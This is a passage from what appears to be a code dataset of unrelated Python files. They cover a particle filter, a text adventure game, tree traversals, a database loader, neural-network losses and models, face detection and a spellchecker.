c = np.zeros(N)
c[0] = 0
for i in range(1,N):
c[i] = c[i-1] + w[i]
u = np.zeros(N)
u[0] = np.random.uniform(0,1.0/N)
i = 0 #starting at bottom of cdf
for j in range(N):
u[j] = u[0] + (1.0/N)*j
while u[j] > c[i]:
i = i + 1
i = min(N-1,i)
if i == N-1:
break
#print "j:",j,"i:",i
X_hyps[:,j] = X_hyps[:,i]
w[j] = 1.0/N
#print "w:",w
#print "X_hyps:",X_hyps[0,:]
# if (t+1) == 5:
# pylab.plot(X_hyps[0,:],X_hyps[1,:],'ro',markersize=2,linewidth=1,label='updated PF')
# pylab.plot(X_act[0,t+1],X_act[1,t+1],'bo',markersize=2,linewidth=1,label='Actual')
# pylab.legend()
# pylab.xlabel('x')
# pylab.ylabel('y')
# pylab.xlim(-4,4)
# pylab.ylim(-1,4)
# #pylab.show()
# pylab.savefig('/home/naveed/Dropbox/Sem 3/Aero 626/HW3/'+'2_1_PF_t5_update.pdf', format='pdf',bbox_inches='tight',pad_inches = .06)
#calculating estimate
X_temp = np.zeros(3)
for i in range(N):
X_temp = X_temp + w[i]*X_hyps[:,i]
X_est[:,t+1] = X_temp.reshape((3,))
#calculating variance
P_temp = np.zeros((system.state_dim,system.state_dim))
for i in range(N):
X_err = mat((X_hyps[:,i] - X_est[:,t+1]).reshape(3,1)).astype(np.float64)
P_temp = P_temp + np.matmul(X_err,X_err.T)
P[:,t+1] = (1.0/(N-1))*P_temp.reshape((9,))
#print "P:", P[:,t+1]
# pylab.figure(2)
# pylab.plot(X_hyps[1,:],w,'ro',markersize=2,linewidth=1,label='Particles x1')
# pylab.legend()
# pylab.show()
return X_est, X_act, P
|
991,678 | 8507ba4d597876af0f004050c07e02a4317c79b6 | #Program setup - numbers
import random
import pickle
Size = 50
f = open('Lotto_Data.dat','wb')
Lotto_Size = 6
grid = [0]*(Size*Lotto_Size)
count = 0
#Option: Seed the number table with random numbers
#while count < Size:
# q = 0
# while q < 6:
# num = int(random.random()*49+1)
# grid[num] += 1
# q += 1
# count += 1
print grid
placeholder = 0
pickle.dump(placeholder, f)
pickle.dump(grid, f)
|
991,679 | 14197c1aa8eaf6248ba3270a3fb20be40ebef96e | import logging
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ex_log = logging.getLogger('Exception_Logger')
log = logging.getLogger('Logger')
ex_log.setLevel(logging.WARNING)
log.setLevel(logging.INFO)
fh1 = logging.FileHandler('ex_log.log', encoding='utf-8')
fh2 = logging.FileHandler('log.log', encoding='utf-8')
fh1.setFormatter(formatter)
fh2.setFormatter(formatter)
ex_log.addHandler(fh1)
log.addHandler(fh2)
|
991,680 | 5be23f0d0dde720a35cc94f39cf6059356b44452 | from torchvision import models
model = models.densenet121(pretrained=True)
for pram in model.parameters():
pram |
991,681 | 53f92e056fbbda9c2b33196b5ea108fe07703f8b | import json
import yaml
class Detector(object):
def __init__(self, config_file):
config = yaml.load(open(config_file))
# 伪代码 需修改
# self.__detector1 = Detector1(config)
# self.__detector2 = Detector2(config)
def detect(self, code):
infos1 = self.__detector1.detect(code);
infos2 = self.__detector2.detect(code);
return json.dumps({
'code': code,
'detectExceptionInfos': infos1 + infos2
})
|
991,682 | 3af4c288207f00b8fe3b4ed9ab27ffa7826f9154 | #!/usr/bin/env python3
import sys
import os
class Place(object):
"""
Fluent Interface for a location in the quest. Provides default behavior
Args:
items: a list of items that the player has at their disposal
finished_places: integer to represent how many steps have been'
completed in the correct order.
Returns:
None
"""
def __init__(self, items, finished_places):
self.items = items
self.finished_places = finished_places
self.in_thing = []
if(self.finished_places == 0):
os.system('clear')
print('Here is the part where I tell you a story if i were a bette'
'r writer there would be a better story: You should probably'
' type "GET ALL" followed by "OPEN DOOR" and finally "EAST"')
def light(self, item):
"""
default method -- no real functionality
Args:
item: list of items to light
Returns:
self
Throws:
IndexError if item is empty
"""
item = ' '.join(item)
print('no ' + item + ' for ugg')
return self
def examine(self, item):
"""
default method -- no real functionality
Args:
item: list of items to examine
Returns:
self
Throws:
IndexError if item is empty
"""
item = ' '.join(item)
print(' you look closely at the ' + str(item) + ' and see nothing '
'useful')
return self
def get_take(self, item):
"""
default method adds edelweiss, prism, and pickle to invertory if '
'all'
is the item to get. else adds the item to inventory.
Args:
item: list of items to get
Returns:
self
Throws:
IndexError if item is empty
"""
item = ' '.join(item)
if str(item) == 'all':
if self.finished_places == 0:
self.items = ['edelweiss']
self.items.append('prism')
self.items.append('pickle')
self.finished_places += 1
elif(self.items):
self.items.append(item)
else:
self.items = [item]
return self
def openn(self, thing):
"""
default method -- no real functionality
Args:
item: list of items to open
Returns:
self
Throws:
IndexError if item is empty
"""
thing = ' '.join(thing)
if thing == 'door':
if self.finished_places == 1:
self.finished_places += 1
return self
def drop(self, item):
"""
default method removes item from inventory if it is there -- else
prints error
Args:
item: list of items to be removed
Returns:
self
Throws:
IndexError if item is empty
"""
item = ' '.join(item)
if not(item in self.items):
print("you don't have a " + str(item) + " to drop")
self.items.remove(item)
return self
# implement
def put_in(self, items):
"""
default method no real functionality -- checks to see if both items
are in inventory
Args:
items: list containing items to put in each other
Returns:
self
"""
try:
if items[0] not in self.items:
print("you don't have a " + str(items[0]))
return self
if items[2] not in self.items:
print("you don't have a " + str(items[1]))
return self
except IndexError:
print('put ' + str(items[0]) + ' where')
except TypeError:
print('you don\'t have anything')
return self
# implement
def wait(self, *args):
"""
default method -- no real functionality
Args:
args: not used at all
Returns:
self
"""
print("and why are we stoping here?")
return self
def move(self, direction):
"""
Function to create new instances of the class(or subclasses)
with the appropiate functionality.
Args:
direction: name of subclass to initialize(north, up, east)
will default to simply creating new Place
Returns:
a new instance of Place class or one of its sub-classes
Throws:
IndexError if direction is empty
"""
try:
if self.in_thing:
print("You have to get out of the " + str(*self.in_thing[-1]) +
" first")
return self
if direction == 'north':
if self.finished_places == 12:
self.finished_places += 1
return North(self.items, self.finished_places)
if direction == 'up':
if self.finished_places == 4:
self.finished_places += 1
return Up(self.items, self.finished_places)
if direction == 'east':
if self.finished_places == 2:
self.finished_places += 1
return East(self.items, self.finished_places)
except AttributeError:
self.items = []
return self.move(direction)
print(' you didn\'t listen to my very subtle hints, i know it was hard'
' your lost now. if you remember the commands i told you you can'
' go back to where you left off and continue, just type "QUIT"')
return Place(self.items, self.finished_places)
# implement
# return new instance on class
def enter(self, thing):
"""
function used to keep track of enter and exit calls -- adds to a
stack
Args:
thing: item to 'enter'
Returns:
self
Throws:
IndexError if thing is empty
"""
self.in_thing.append(thing)
return self
# if thing == 'cave':
# if self.finished_places == 5:
# self.finished_places += 1
def exit(self, thing):
"""
function used to keep track of enter and exit calls -- removes from
stack
Args:
thing: item to 'exit'
Returns:
self
Throws:
IndexError if thing is empty
"""
if(not len(self.in_thing)):
print('you aren\'t in anything')
return self
last = self.in_thing.pop()
if(last != thing):
print('you have to get out of the ' + str(*last) + ' first')
self.in_thing.append(last)
return self
# if thing == 'cave':
# if self.finished_places == 11:
# self.finished_places += 1
class North(Place):
"""
Implements Place --- overwrites get_take function
"""
# get meaning of life is only useful thing
def __init__(self, items, finished_places):
super(North, self).__init__(items, finished_places)
os.system('clear')
print('you should probably "GET MEANING OF LIFE"')
# things North has
def get_take(self, item):
"""
checks to see if item is 'the meaning of life' and all other steps
required
to win are true. else calls super().get_take
Args:
item: item to get
Returns:
false on win condition
self otherwise
Throws:
IndexError
"""
item = ' '.join(item)
if self.finished_places == 13:
if item == 'meaning of life':
print('you win')
return False
return super(North, self).get_take(item)
# if item is meaning of life -- win
class Up(Place):
"""
Implements Place --- overwrites light, wait, put_in, exit functions
"""
# ENTER CAVE
# LIGHT FIRE
# WAIT
# PUT EDELWEISS IN FIRE
# PUT HELMET IN STATUE
# PUT PRISM IN PICKLE
# EXIT CAVE
def __init__(self, items, finished_places):
super(Up, self).__init__(items, finished_places)
self.items.append('helmet')
os.system('clear')
print('I know this is a terrible story, I\'m not a writer'
'here is where i subtly tell you to "ENTER CAVE", "LIGHT FIRE",'
' "WAIT", "PUT EDELWEISS IN FIRE", "PUT HELMET IN STATUE", "PUT'
' PRISM IN'
' PICKLE", "EXIT CAVE", "NORTH"')
def light(self, item):
"""
checks to see if item is fire and all other previous steps have
been taken
if not calls super.light()
Args:
item: item to light
Returns:
self
Throws:
IndexError
"""
item = ' '.join(item)
if item == 'fire':
print('ohh fire')
self.items.append('fire')
if self.finished_places == 6:
self.finished_places += 1
return self
return super(Up, self).light(item)
# if item is fire do stuff
def put_in(self, item):
"""
checks for commands : PUT EDELWEISS IN FIRE # PUT HELMET IN STATUE
# PUT PRISM IN PICKLE
and all other steps to have been completed.
Args:
item: list of items to put in each other
Returns:
self
Throws:
IndexError
"""
try:
place = item[2]
action = item[1]
item = item[0]
except IndexError:
print('put ' + str(item[0]) + ' where')
return self
except TypeError:
print('you don\'t have anything')
if place not in self.items:
print("you don't have a " + str(place))
return self
elif item not in self.items:
print("you don't have a " + str(item))
return self
elif item == 'edelweiss' and place == 'fire':
if self.finished_places == 8:
self.finished_places += 1
elif item == 'helmet' and place == 'statue':
if self.finished_places == 9:
self.finished_places += 1
elif item == 'prism' and place == 'pickle':
if self.finished_places == 10:
self.finished_places += 1
else:
# TODO
print('why whould you do that?')
return self
def wait(self, *args):
"""
checks to see if all previous steps have been completed in order
and
calls super function.
Args:
*args: not used
Returns:
self
"""
# TODO -- say something
if self.finished_places == 7:
self.finished_places += 1
return super(Up, self).wait(*args)
def enter(self, thing):
"""
checks to see if you are entering a cave and all other steps have
been taken
Args:
thing: item to 'enter'
Returns:
self
Throws:
IndexError
"""
super(Up, self).enter(thing)
thing = ' '.join(thing)
if thing == 'cave':
if self.finished_places == 5:
self.items.append('statue')
self.finished_places += 1
return self
def exit(self, thing):
"""
checks to see if you are exiting a cave and all other steps have
been taken
Args:
thing: item to 'exit'
Returns:
self
Throws:
IndexError
"""
super(Up, self).exit(thing)
thing = ' '.join(thing)
if thing == 'cave':
if self.finished_places == 11:
self.items.remove('statue')
self.finished_places += 1
return self
# implement
# if command is enter -- add thing to in_thing
# if out -- check to see if thing is last in list -- remove from list
class East(Place):
# GET EDELWEISS
def __init__(self, items, finished_places):
super(East, self).__init__(items, finished_places)
os.system('clear')
print(' more story goes here: type "GET EDELWEISS" and "UP"')
def get_take(self, item):
"""
checks to see if you are getting edelweiss and all other steps have
been taken
Args:
item: item to get
Returns:
self
Throws:
IndexError
"""
item = ' '.join(item)
if item == 'edelweiss':
if self.finished_places == 3:
self.finished_places += 1
return self
return super(East, self).get_take(item)
def main():
quest = Place(None, 0)
while(quest):
todo = {'light': quest.light,
'examine': quest.examine,
'get': quest.get_take,
'take': quest.get_take,
'drop': quest.drop,
'put': quest.put_in,
'wait': quest.wait,
'enter': quest.enter,
'exit': quest.exit,
'open': quest.openn,
'quit': sys.exit}
user = input("enter something: ")
user = user.lower()
user = user.split()
try:
quest = todo[user[0]](user[1::])
except KeyError:
quest = quest.move(user[0])
except IndexError:
if(user):
print(str(user[0]) + ' what?')
else:
print("Enter a command!")
except ValueError:
print('you don\'t have anything')
# input()
# do task
# if task is not in list move
if __name__ == "__main__":
main()
|
991,683 | 2cab4c4183d885c65cff80a6a26bf00881310bf9 | from common import TreeNode
class Solution(object):
def LDR(self, root):
res = []
stack = [None]
node = root
while node:
if node.left:
stack.append(node)
node = node.left
else:
while node and not node.right:
res.append(node.val)
node = stack.pop()
if node:
res.append(node.val)
node = node.right if node else node
return res
def DLR(self, root):
res = []
stack = [None]
node = root
while node:
res.append(node.val)
if node.left:
stack.append(node)
node = node.left
else:
while node and not node.right:
node = stack.pop()
node = node.right if node else node
return res
def LRD(self, root):
res, visited = [], set()
stack = [root]
node = root
while len(stack):
if node.left and node.left not in visited:
stack.append(node)
node = node.left
elif node.right and node.right not in visited:
stack.append(node)
node = node.right
else:
res.append(node.val)
visited.add(node)
node = stack.pop()
return res
if __name__ == '__main__':
solution = Solution()
tree = TreeNode.list2Tree([5, 3, 9, 2, 4, 7, 10, 1, None, None, None, 6, 8, None, 11])
print(solution.LDR(tree))
print(solution.DLR(tree))
print(solution.LRD(tree))
|
991,684 | 5abc79e28c4b85d51c613a4a8744048a15766506 | #!/home/apollo/anaconda3/bin/python3
#-*- coding: utf-8 -*-
#******************************************************************************
# Author : jtx
# Last modified: 2020-09-03 16:37
# Filename : investor_kbp.py
# Description : 投资人kbp
#******************************************************************************
import sys
import logging
import time
from tqdm import tqdm
import datetime
from pymongo import MongoClient
from pyArango.connection import Connection as ArangoConnection
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)
## 投资机构数据库
MONGO_HOST = "xxx"
MONGO_PORT = 0
MONGO_DB = "xxx"
MONGO_COLLECTION = "xxx"
MONGO_USER = "xxx"
MONGO_PASSWD = "xxx"
## 导入目标arangodb数据库
ARANGO_URL = "http://xxx"
ARANGO_USER = "xxx"
ARANGO_PASSWD = "xxx"
ARANGO_DB = "xxx"
ARANGO_INVESTOR_COLLECTION = "xxx" ## 投资机构库
class InvestorKBP:
def process(self, date_str):
process_date = None
next_date = None
## 默认处理昨天采集的数据
if date_str == "yesterday":
date_str = (datetime.date.today() - datetime.timedelta(days=1)).strftime("%Y-%m-%d")
logger.info("执行采集时间为: {} 的投资人kbp".format(date_str))
process_date = datetime.datetime.strptime(date_str, "%Y-%m-%d")
next_date = process_date + datetime.timedelta(days=1)
start_time = time.time()
mongo_client = MongoClient(host=MONGO_HOST, port=MONGO_PORT)
admin_db = mongo_client["admin"]
admin_db.authenticate(MONGO_USER, MONGO_PASSWD)
mongo_collection = mongo_client[MONGO_DB][MONGO_COLLECTION]
arango_connector = ArangoConnection(arangoURL=ARANGO_URL,
username=ARANGO_USER,
password=ARANGO_PASSWD)
arango_db = arango_connector[ARANGO_DB]
results = mongo_collection.find({"crawl_time": {"$gte": process_date, "$lte": next_date}}, no_cursor_timeout=True, batch_size=50)
# results = mongo_collection.find(no_cursor_timeout=True, batch_size=50)
source_count = 0
target_count = 0
for result in tqdm(results):
source_count += 1
## 组装
doc = {}
doc["_key"] = str(result["_id"])
doc["name"] = result["name"]
doc["create_time"] = result["crawl_time"]
doc["update_time"] = result["crawl_time"]
doc["properties"] = {
"invest_institution": result["invest_institution"],
"position": result["position"],
"resume": result["resume"],
"phone": result["phone"],
"email": result["email"],
"url": result["url"],
"source": result["source"],
"invest_industry": result["invest_industry"],
"invest_round": result["invest_round"]
}
doc["tags"] = []
doc["relations"] = []
doc["relations"].append({
"relation_name": "任职",
"relation_type": "单向",
"end": result["invest_institution"]
})
## 导入arangodb,覆盖重复数据
try:
## 删除同id数据
arango_collection = arango_db[ARANGO_INVESTOR_COLLECTION]
query = arango_collection.fetchByExample({"_key": doc["_key"]}, batchSize=1)
for q in query:
q.delete()
arango_collection.createDocument(doc).save()
target_count += 1
except Exception as e:
logger.error("导入arangodb错误, id: {}".format(doc["_key"]))
end_time = time.time()
logger.info("本次投资人kbp完成, 耗时: {} 秒".format(int(end_time - start_time)))
logger.info("其中清洗库有: {} 条数据, 导入arangodb有 {} 条数据".format(source_count, target_count))
if __name__ == "__main__":
investorKBP = InvestorKBP()
if len(sys.argv) > 1:
investorKBP.process(sys.argv[1])
else:
raise Exception("请输入执行日期参数") |
991,685 | 8e232f76ca60e912db798c53e8e678e3ed4a4b94 | import tensorflow as tf
import numpy as np
from PIL import Image
import os
import math
from typing import List, Tuple
from memory import BaseMemory
from experience import Experience
import networks
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
class Brain:
def __init__(self, memory: BaseMemory, img_size: Tuple, nov_thresh: float = 0.25,
novelty_loss_type: str = 'MSE', train_epochs_per_iter: int = 1, learning_rate: float = 0.001):
"""Initializes the Brain by creating CNN and AE
Args:
memory: BaseMemory
A memory object that implements BaseMemory (such as PriorityBasedMemory)
img_size: Tuple
The image size of each grain from the agent's field of view
nov_thresh : float
(Currently deprecated). The novelty cutoff used in training
novelty_loss_type: str
A string indicating which novelty function to use (MSE or MAE)
train_epochs_per_iter: int
Number of epochs to train for in a single training session
learning_rate: float
Learning rate for neural network optimizer
"""
assert train_epochs_per_iter > 0
self._memory = memory
self._img_size = img_size
self._train_epochs_per_iter = train_epochs_per_iter
self._nov_thresh = nov_thresh
self._batch_size = 4
self._novelty_loss_type = novelty_loss_type
self._learning_rate = learning_rate
self._loss_functions = { \
"mae": tf.keras.losses.MeanAbsoluteError(), \
"mse": tf.keras.losses.MeanSquaredError(), \
}
if novelty_loss_type.lower() not in self._loss_functions:
print("Novelty loss type not recognized. Exiting.")
exit(1)
self.novelty_function = self._loss_functions[novelty_loss_type.lower()]
# Create network and optimizer
self._network = networks.create_network(img_size)
self._optimizer = tf.keras.optimizers.Adam(learning_rate=learning_rate)
# print("Initialized Brain")
def get_name(self):
"""Returns the full descriptive name of the brain object.
Returns
The name of the brain object as a string
"""
name_str = "Brain"
name_str += "_" + self._memory.get_name()
name_str += "_ImgSize" + str(self._img_size[0])
name_str += "_Nov" + self._novelty_loss_type.upper()
name_str += "_Train" + str(self._train_epochs_per_iter)
name_str += "_Lrate" + str(self._learning_rate)
return name_str
# def _init_CNN(self):
# """Initialize the Convolutional Neural Network"""
# # Create the base CNN model
# # TODO: Use different CNN base?
# self._CNN_Base = tf.keras.applications.VGG16(include_top=True)
# self._CNN_Base.trainable = False
# self._CNN = tf.keras.Model(self._CNN_Base.input, self._CNN_Base.layers[-1].input) # Use last FC layer as output
# def _init_AE(self):
# """Initialize the Auto Encoder"""
# # VGG FC layers use 4096 neurons
# input_vec = tf.keras.layers.Input(shape=(4096,))
# # Encoder
# # TODO: Maybe try LeakyRelu(alpha=0.2) for all activations
# e = tf.keras.layers.Dense(4096, 'relu')(input_vec)
# e = tf.keras.layers.Dense(1024, 'relu')(e)
# e = tf.keras.layers.Dense(256, 'relu')(e)
# e = tf.keras.layers.Dense(16, 'relu')(e)
# # Decoder
# d = tf.keras.layers.Dense(16, 'relu')(e)
# d = tf.keras.layers.Dense(256, 'relu')(d)
# d = tf.keras.layers.Dense(1024, 'relu')(d)
# output = tf.keras.layers.Dense(4096, 'relu')(d)
# self._AE = tf.keras.Model(input_vec, output)
def _grain_to_tensor(self, grain_in: Image.Image):
"""Convert a single grain to a tf.Tensor
Params
------
grain_in : Image.Image
An image from the rover's "camera" that needs to be preprocessed
Return
------
The grain as a tf.Tensor
"""
# rgb_grain = Image.new("RGB", grain_in.size)
# rgb_grain.paste(rgb_grain)
# rgb_grain = tf.keras.preprocessing.image.img_to_array(rgb_grain)
# rgb_grain = tf.image.per_image_standardization(rgb_grain) # Transform images to zero mean and unit variance
# rgb_grain = tf.image.resize(rgb_grain, (self._image_width, self._image_width)) # Resize to CNN base input size
tf_img = tf.keras.preprocessing.image.img_to_array(grain_in)
tf_img = (tf_img - 127.5) / 127.5 # Normalize to [-1,1]
tf_img = tf.reshape(tf_img, self._img_size)
return tf_img
def add_grains(self, grains: List[List[Image.Image]]):
"""Add new grains to memory
Params:
grains: List[List[Image.Image]]
2D List of new grains
Returns:
2D List of novelty for new grains
"""
# print("Adding new grains to memory...")
assert len(grains) == 2 # Currently, we only allow 4 grains
assert len(grains[0]) == 2 # Currently, we only allow 4 grains
nov_list = []
for row in grains:
temp_nov = []
for g in row:
grain_tf = self._grain_to_tensor(g)
grain_tf = tf.reshape(grain_tf, (1, grain_tf.shape[0], grain_tf.shape[1], grain_tf.shape[2])) # Reshape to (1,H,W,C)
predicted_grain = self._network(grain_tf)
nov = self.novelty_function(grain_tf, predicted_grain).numpy()
temp_nov.append(nov)
self._memory.push(Experience(nov, g))
nov_list.append(temp_nov)
return nov_list
def evaluate_grains(self, grains: List[List[Image.Image]]):
"""Evaluate a list of grains
Params:
grains: List[List[Image.Image]]
2D List of new grains
Returns:
2D List of novelty for new grains, and 2D list for reconstructed grains
"""
# print("Evaluating grain novelty...")
assert grains != [] and grains is not None
nov_list = []
pred_grains_list = []
for row in grains:
temp_nov = []
temp_grains = []
for g in row:
grain_tf = self._grain_to_tensor(g)
grain_tf = tf.reshape(grain_tf, (1, grain_tf.shape[0], grain_tf.shape[1], grain_tf.shape[2])) # Reshape to (1,H,W,C)
predicted_grain = self._network(grain_tf)
nov = self.novelty_function(grain_tf, predicted_grain).numpy()
temp_nov.append(nov)
pred_grain = tf.reshape(predicted_grain, (grain_tf.shape[1], grain_tf.shape[2], grain_tf.shape[3]))
pred_grain = tf.keras.preprocessing.image.array_to_img((pred_grain * 127.5) + 127.5) # Convert back to [0,255]
temp_grains.append(pred_grain)
nov_list.append(temp_nov)
pred_grains_list.append(temp_grains)
return nov_list, pred_grains_list
@tf.function
def _train_step(self, images: tf.Tensor):
"""Performs a single training step for the network.
Params:
images: tf.Tensor
A batch of images of size (batch, height, width, channel) for trainng the network
Returns:
The training loss for this step
"""
with tf.GradientTape() as tape:
predicted = self._network(images, training=True)
loss = self.novelty_function(images, predicted)
gradients = tape.gradient(loss, self._network.trainable_variables)
self._optimizer.apply_gradients(zip(gradients, self._network.trainable_variables))
return loss
def learn_grains(self):
"""Train the network to learn new features from memory
Returns:
The current average loss from the last training epoch
"""
memory_list = self._memory.as_list()
grains = list(map(lambda e: self._grain_to_tensor(e.grain), memory_list))
dataset = tf.data.Dataset.from_tensor_slices(grains).shuffle(self._batch_size).batch(self._batch_size).repeat()
dataset = iter(dataset)
num_batches = math.ceil(len(memory_list) / self._batch_size)
cur_avg_loss = 0
for i in range(self._train_epochs_per_iter):
cur_avg_loss = 0
for j in range(num_batches):
data = dataset.next()
loss = self._train_step(data).numpy()
cur_avg_loss += (loss/num_batches)
return cur_avg_loss
if __name__ == "__main__":
from memory import PriorityBasedMemory, ListBasedMemory
img = Image.open('data/x.jpg').convert('L').resize((64,64))
# NOTE
# 0.25 seems to be the smallest value that the novelty loss will go.
# If we use nov_thresh for training, do not set below 0.25
brain1 = Brain(ListBasedMemory(64), (64,64,1), 0.25, 'MSE', 1)
brain2 = Brain(PriorityBasedMemory(64), (64,64,1), 0.25, 'MSE', 10, 0.001)
print(brain2.get_name())
grain_nov = brain2.add_grains([
[img, img],
[img, img]
])
print("Grain novelty (before): ", grain_nov)
loss = brain2.learn_grains()
print(F"Loss: {loss}")
grain_nov, _ = brain2.evaluate_grains([
[img, img],
[img, img]
])
print("Grain novelty (after): ", grain_nov)
|
991,686 | 9f9ec86e8c46b92acbc722ed43fefa90e3e9e73b | # -*- coding: UTF-8 -*-
from typing import Tuple
import torch
from torch import nn, Tensor
class SparseCircleLoss(nn.Module):
def __init__(self, m: float, emdsize: int ,class_num: int, gamma: float) -> None:
super(SparseCircleLoss, self).__init__()
self.margin = m
self.gamma = gamma
self.soft_plus = nn.Softplus()
self.class_num = class_num
self.emdsize = emdsize
self.weight = nn.Parameter(torch.FloatTensor(self.class_num, self.emdsize))
nn.init.xavier_uniform_(self.weight)
self.use_cuda = False
def forward(self, input: Tensor, label: Tensor) -> Tensor:
similarity_matrix = nn.functional.linear(nn.functional.normalize(input,p=2, dim=1, eps=1e-12), nn.functional.normalize(self.weight,p=2, dim=1, eps=1e-12))
if self.use_cuda:
one_hot = torch.zeros(similarity_matrix.size(), device='cuda')
else:
one_hot = torch.zeros(similarity_matrix.size())
one_hot.scatter_(1, label.view(-1, 1).long(), 1)
one_hot = one_hot.type(dtype=torch.bool)
#sp = torch.gather(similarity_matrix, dim=1, index=label.unsqueeze(1))
sp = similarity_matrix[one_hot]
mask = one_hot.logical_not()
sn = similarity_matrix[mask]
sp = sp.view(input.size()[0], -1)
sn = sn.view(input.size()[0], -1)
ap = torch.clamp_min(-sp.detach() + 1 + self.margin, min=0.)
an = torch.clamp_min(sn.detach() + self.margin, min=0.)
delta_p = 1 - self.margin
delta_n = self.margin
logit_p = - ap * (sp - delta_p) * self.gamma
logit_n = an * (sn - delta_n) * self.gamma
loss = self.soft_plus(torch.logsumexp(logit_n, dim=1) + torch.logsumexp(logit_p, dim=1))
return loss.mean()
if __name__ == "__main__":
features = torch.rand(64, 128, requires_grad=True)
label = torch.randint(high=9, size=(64,))
SparseCircle = SparseCircleLoss(m=0.25, emdsize=128, class_num=10, gamma=64)
loss = SparseCircle(features , label)
print(loss)
|
991,687 | 26b3de9324f7a1f2713cd46879cd4d17e2018fb6 | import caffe
from caffe import layers as L, params as P, to_proto
def mynet():
data, label = L.DummyData(shape=[dict(dim=[8, 1, 28, 28]),
dict(dim=[8, 1, 1, 1])],
transform_param=dict(scale=1./255), ntop=2)
# CAFFE = 1
# MKL2017 = 3
kwargs = {'engine': 3}
conv1 = L.Convolution(data, kernel_size=[3, 4, 5], num_output=3, pad=[1, 2, 3])
bn1 = L.BatchNorm(conv1, **kwargs)
relu1 = L.ReLU(bn1, **kwargs)
convargs = {'param': [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=2)],
'convolution_param': dict(num_output=64,
kernel_size=2,
stride=2,
engine=P.Convolution.CAFFE,
bias_filler=dict(type='constant', value=0),
weight_filler=dict(type='xavier'))
}
deconv1 = L.Deconvolution(relu1, **convargs)
return to_proto(deconv1)
net = mynet()
print str(net)
|
991,688 | 517c8456331b67fd9454b2349d2473a2599aa9ad | import cv2
import face_recognition
print(cv2.__version__)
image = face_recognition.load_image_file('/home/fred/Documents/coding/Lernen/faceRecognizer/demoImages/unknown/u3.jpg')
face_locations = face_recognition.face_locations(image)
print(face_locations)
image=cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
for (row1, col1, row2, col2) in face_locations:
cv2.rectangle(image, (col1, row1), (col2, row2), (0,0,255), 2)
cv2.imshow('myWindow', image)
cv2.moveWindow('myWindow', 10, 10)
if cv2.waitKey(0) & 0xFF == ord('q'):
cv2.destroyAllWindows
|
991,689 | aa8c6a7abd9b2439fa276f9ea06bc690fa8cc3b4 | """
Smartcheck: smart spellcheck in pure Python.
FEATURES:
- Norvig's autocorrect
- 3-gram language model
TODO:
- Combine Norvig + 3-gram approaches
- Build better error model with errors from text
- Save + pickle the trained 3-gram, language, error models
"""
from nltk import bigrams, word_tokenize
from nltk.corpus import nps_chat
from collections import Counter, defaultdict
import re
class Smartcheck:
"""A smart spell checker.
Uses a bigram language model.
"""
def __init__(
self,
dict_file = "dictionary.txt",
model_file = "count_1w.txt",
bigram_file = "count_2w.txt"
):
"""Initializes language model with trigram probabilities."""
self.dict_file = dict_file
self.model_file = model_file
self.bigram_file = bigram_file
self.bigrams = defaultdict(lambda: defaultdict(lambda: 0))
self.model = {}
self.pop_model()
self.pop_bigrams()
def process_file(self, filename):
content = {}
with open(filename, "r") as f:
for line in f.readlines():
key, val = line.split("\t")
content[key.lower()] = int(val)
return content
def sentences(self, text):
"""All sentences in a given text."""
return re.findall(r'([A-Z][^\.!?]*[\.!?])', text)
def words(self, text):
"""All words in a given text."""
return re.findall(r'\w+', text)
def pop_model(self):
"""Populate model with probability of word."""
dict_words = set([line.strip().lower() for line in open(self.dict_file, "r").readlines()])
word_counts = self.process_file(self.model_file)
N = sum(word_counts.values())
for word in word_counts:
if word in dict_words:
self.model[word] = word_counts[word] / N
def pop_bigrams(self):
"""Populate self.bigrams with probs of next words using Norvig"""
bigram_counts = self.process_file(self.bigram_file)
N = sum(bigram_counts.values())
for bigram in bigram_counts:
self.bigrams[bigram.lower()] = bigram_counts[bigram] / N
def pop_bigrams_old(self, corpus):
"""Populate self.bigrams with probabilities of next words"""
for sentence in corpus.sents():
for w1, w2 in bigrams(word_tokenize(sentence), pad_right=True, pad_left=True):
self.bigrams[w1][w2] += 1
# Convert trigrams to probabilities
for wp in self.bigrams:
total_count = float(sum(self.bigrams[wp].values()))
for w2 in self.bigrams[wp]:
self.bigrams[wp][w2] /= total_count
def predict(self, sentence):
"""Predict the next words given the sentence."""
prev_two_words = sentence.split()[-2:]
options = dict(self.trigrams[tuple(prev_two_words)])
return options
def word_probability(self, word, prev):
"""Probability of a given word."""
bg = "{} {}".format(prev, word)
p_c = self.model[word] if word in self.model else 1e-10
p_cw = self.bigrams[bg] if bg in self.bigrams else 1e-10
p = p_c * p_cw if prev else p_c
return p
def correct_sentence(self, sentence):
corrected = ""
words = [w.strip().lower() for w in self.words(sentence)]
for i in range(1, len(words)):
corrected += self.correction(words[i], words[i-1]) + " "
return words[0] + " " + corrected
def correction(self, word, prev):
"""Return the most probable correction."""
# Case 1: word is in model
if word in self.model:
return word
# Case 2: word is unknown
return max(self.candidates(word), key=lambda w: self.word_probability(w, prev))
def candidates(self, word):
"""Candidate list of possible correct words."""
return (self.known([word]) or \
self.known(self.edits1(word)) or \
self.known(self.edits2(word)) or \
set([word]))
def known(self, words):
return set(w for w in words if w in self.model)
def edits1(self, word):
"""All edits that are one edit away from `word`."""
letters = 'abcdefghijklmnopqrstuvwxyz'
splits = [(word[:i], word[i:]) for i in range(len(word) + 1)]
deletes = [L + R[1:] for L, R in splits if R]
transposes = [L + R[1] + R[0] + R[2:] for L, R in splits if len(R)>1]
replaces = [L + c + R[1:] for L, R in splits if R for c in letters]
inserts = [L + c + R for L, R in splits for c in letters]
return set(deletes + transposes + replaces + inserts)
def edits2(self, word):
"All edits that are two edits away from `word`."
return (e2 for e1 in self.edits1(word) for e2 in self.edits1(e1))
def test(test_file):
sc = Smartcheck()
correct = 0
incorrect = 0
with open(test_file, "r") as f:
for line in f.readlines():
wrong, real = line.split("\t")[:2]
predict = sc.correction(wrong, "")
if predict.strip() == real.strip():
correct += 1
else:
incorrect += 1
print(wrong, real, predict)
print("Success rate:")
print(correct / (correct + incorrect))
print("Success rate:")
print(correct / (correct + incorrect))
if __name__ == "__main__":
# test("test2.txt")
sc = Smartcheck()
print(sc.correct_sentence("I like coffe"))
|
